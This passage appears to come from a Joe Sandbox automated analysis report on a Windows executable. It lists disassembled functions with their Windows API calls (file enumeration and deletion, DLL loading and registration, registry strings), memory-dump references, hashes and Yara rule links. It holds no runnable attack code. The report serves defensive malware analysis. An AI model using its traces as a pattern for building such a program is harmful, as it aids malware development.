                                                                                                                                                • Part of subcall function 00414F30: FindFirstFileA.KERNEL32(?,?,?,?), ref: 00414F47
                                                                                                                                                • Part of subcall function 00414F30: FindClose.KERNEL32(00000000), ref: 00414F81
                                                                                                                                              • FindFirstFileA.KERNEL32(?,0040F4C0,?,00000000,?,?,00000000,00000000,?,?,0000005C,00000000), ref: 00415714
                                                                                                                                                • Part of subcall function 00426C69: DeleteFileA.KERNEL32(?,0041900D,?,?,%s\filelist.txt,?,?), ref: 00426C6D
                                                                                                                                                • Part of subcall function 00426C69: GetLastError.KERNEL32 ref: 00426C77
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileFind$First$CloseDeleteErrorLast
                                                                                                                                              • String ID: *.*
                                                                                                                                              • API String ID: 3118232422-438819550
                                                                                                                                              • Opcode ID: 56d7cd1762512bf9ae3bf9e88e6d90c3cb8513fa3674023f66d597dc73aeefa7
                                                                                                                                              • Instruction ID: cbf47a1fe9aaabdb544cd48c2d0f09c466b47d1d9ba07135cc4e04564ba086e3
                                                                                                                                              • Opcode Fuzzy Hash: 56d7cd1762512bf9ae3bf9e88e6d90c3cb8513fa3674023f66d597dc73aeefa7
                                                                                                                                              • Instruction Fuzzy Hash: 47F14D3120CB86CBC721CB288864BFBB7D5AFD6344F544A6DE8C987341EB359849C796
                                                                                                                                              Function 004156B5 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 335fileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • FindFirstFileA.KERNEL32(?,0040F4C0,?,00000000,?,?,00000000,00000000,?,?,0000005C,00000000), ref: 00415714
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileFindFirst
                                                                                                                                              • String ID: *.*
                                                                                                                                              • API String ID: 1974802433-438819550
                                                                                                                                              • Opcode ID: 54f61200abbc225797f1c0ce2760cdaf0bd9c0ffbedeba8a52273200a21410e9
                                                                                                                                              • Instruction ID: 1877e94ef0ce8ff5fbf0691ca38f6eac6a25572973ee1466535c20e71dfeb6f4
                                                                                                                                              • Opcode Fuzzy Hash: 54f61200abbc225797f1c0ce2760cdaf0bd9c0ffbedeba8a52273200a21410e9
                                                                                                                                              • Instruction Fuzzy Hash: 34C10931208B86CBC721CB2484647FBB7E5BFD6345F58496EE8C683301EB35984AC796
                                                                                                                                              Function 004145D0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 243fileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?,?,?,?,?), ref: 00414684
                                                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 004146D5
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0041472B
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 0041478D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Find$File$First$CloseNext
                                                                                                                                              • String ID: *.*
                                                                                                                                              • API String ID: 2001080981-438819550
                                                                                                                                              • Opcode ID: cd8b76d4ab3ece41a87f241e506bef1def962168270d0846ba8206e87e42ead1
                                                                                                                                              • Instruction ID: d464e212dd68eb2a0debe0c153d34ad098e3c75a0d726ec831b8764db62cd133
                                                                                                                                              • Opcode Fuzzy Hash: cd8b76d4ab3ece41a87f241e506bef1def962168270d0846ba8206e87e42ead1
                                                                                                                                              • Instruction Fuzzy Hash: 7C8125351087C68BC725DF249824BEBB7D5EFD3345F144A2AE8C587340EB39988AC795
                                                                                                                                              Function 00414626 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 185fileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?,?,?,?,?), ref: 00414684
                                                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 004146D5
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0041472B
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 0041478D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Find$File$First$CloseNext
                                                                                                                                              • String ID: *.*
                                                                                                                                              • API String ID: 2001080981-438819550
                                                                                                                                              • Opcode ID: f01309ff1fd51b0ac24277021250d98bb08df7d23f875b14e1aae546966c7c90
                                                                                                                                              • Instruction ID: 72dfbb3d70468e9ec892d8d425d37a8d7061e44efa945190d4a59d62a0781805
                                                                                                                                              • Opcode Fuzzy Hash: f01309ff1fd51b0ac24277021250d98bb08df7d23f875b14e1aae546966c7c90
                                                                                                                                              • Instruction Fuzzy Hash: 465134351087C58BC725DF2498247EBB7D5FBD2305F144A2EE8C587341EB39988AC796
                                                                                                                                              Function 00411010 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 137windowCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetLastError.KERNEL32(00000400,?,00000000,00000000,80000002,?), ref: 00411158
                                                                                                                                              • FormatMessageA.KERNEL32(00001300,00000000,00000000), ref: 00411166
                                                                                                                                              • LocalFree.KERNEL32(?,00000000,?,setSwapSize,00000000), ref: 00411184
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                                              • String ID: %I64d$SOFTWARE\$SwapSize$setSwapSize
                                                                                                                                              • API String ID: 1365068426-648712029
                                                                                                                                              • Opcode ID: d1cf75ccfc781d7461786fe8e806264fada37e45de825a409030c8232c35aa3b
                                                                                                                                              • Instruction ID: 68c570f812988241753bd2a04a9715a3b5369f07d8492d5d9d524d181d3e445a
                                                                                                                                              • Opcode Fuzzy Hash: d1cf75ccfc781d7461786fe8e806264fada37e45de825a409030c8232c35aa3b
                                                                                                                                              • Instruction Fuzzy Hash: 96412571208341ABD314CF28C811BBBB7E5FBC9704F108A1EFA9597290DB75A846C79A
                                                                                                                                              Function 00414D36 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 128fileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 00414DDE
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00414DED
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 00414E00
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Find$File$CloseFirstNext
                                                                                                                                              • String ID: \*.*
                                                                                                                                              • API String ID: 3541575487-1173974218
                                                                                                                                              • Opcode ID: b971a40414e8ad980f72b527b3df65cccc3f835ededa111a898185c93d355f4f
                                                                                                                                              • Instruction ID: 73ed92b0838a6fd84eecc73f45936914938e06500c24726ad6d6a21ef8ce5d97
                                                                                                                                              • Opcode Fuzzy Hash: b971a40414e8ad980f72b527b3df65cccc3f835ededa111a898185c93d355f4f
                                                                                                                                              • Instruction Fuzzy Hash: 14414C751087854BC721CB24A8147FBBBD5FBD2306F144929EDC587301EB39988AC7AA
                                                                                                                                              Function 0040F650 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 77libraryloaderCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA), ref: 0040F690
                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0040F697
                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 0040F6AB
                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 0040F6CF
                                                                                                                                              • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 0040F6EA
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorLast$AddressDiskFreeHandleModuleProcSpace
                                                                                                                                              • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                                              • API String ID: 3160920872-3712701948
                                                                                                                                              • Opcode ID: b81541dc3e96a0be4577df6b92fbd7b30589bb316c3bcf877a1cbfb86ccf1b4f
                                                                                                                                              • Instruction ID: 7ad7b93e94fca053afe9f72b981c6a2b3715ccf3ef72a9c3208e8f43e9ae2302
                                                                                                                                              • Opcode Fuzzy Hash: b81541dc3e96a0be4577df6b92fbd7b30589bb316c3bcf877a1cbfb86ccf1b4f
                                                                                                                                              • Instruction Fuzzy Hash: 13214336208302AFC311DF65D804F9B77E4BB96304F05897EF581A2150EA74D508CBA7
                                                                                                                                              Function 004148D0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 37libraryloaderCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • SetErrorMode.KERNEL32(00000003,dll,?,?,75920F00,00414AE2,?), ref: 004148DE
                                                                                                                                              • LoadLibraryA.KERNEL32(?), ref: 004148E7
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DllRegisterServer), ref: 00414902
                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 0041490F
                                                                                                                                              • SetErrorMode.KERNEL32(00000000), ref: 00414916
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
